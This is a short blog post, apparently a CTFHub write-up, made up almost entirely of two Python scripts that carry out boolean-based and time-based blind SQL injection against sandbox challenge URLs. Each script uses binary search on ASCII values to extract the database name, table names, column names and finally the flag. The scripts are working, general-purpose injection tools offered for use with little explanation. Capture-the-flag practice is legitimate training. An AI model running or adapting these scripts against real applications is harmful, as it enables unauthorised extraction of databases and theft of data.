zoukankan      html  css  js  c++  java
  • sql布尔盲注和时间盲注的二分脚本

    布尔盲注:

    import requests
    
    url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"
    
    def inject_database(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_table(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_column(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def flag(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    # inject_database(url)
    # inject_table(url)
    # inject_column(url)
    flag(url)
    

    时间盲注:

    import requests
    import time
    
    #   time.time()
    
    url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"
    
    def inject_database(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_table(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_column(url):
    	name = ''
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def flag(url):
    	name = ''
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    # inject_database(url)
    # inject_table(url)
    # inject_column(url)
    flag(url)
    
  • 相关阅读:
    突然地心血来潮,为 MaixPy( k210 micropython ) 添加看门狗(WDT) C 模块的开发过程记录,给后来的人做开发参考。
    Vular开发手记#1:设计并实现一个拼插式应用程序框架
    VUE实现Studio管理后台(完结):标签式输入、名值对输入、对话框(modal dialog)
    VUE实现Studio管理后台(十三):按钮点选输入控件,input输入框系列
    VUE实现Studio管理后台(十二):添加输入组合,复杂输入,输入框Input系列
    VUE实现Studio管理后台(十一):下拉选择列表(Select)控件,输入框input系列
    VUE实现Studio管理后台(十):OptionBox,一个综合属性输入界面,可以级联重置
    VUE实现Studio管理后台(九):开关(Switch)控件,输入框input系列
    VUE实现Studio管理后台(八):用右键菜单contextmenu,编辑树形结构
    VUE实现Studio管理后台(七):树形结构,文件树,节点树共用一套代码NodeTree
  • 原文地址:https://www.cnblogs.com/lemon629/p/13870659.html
Copyright © 2011-2022 走看看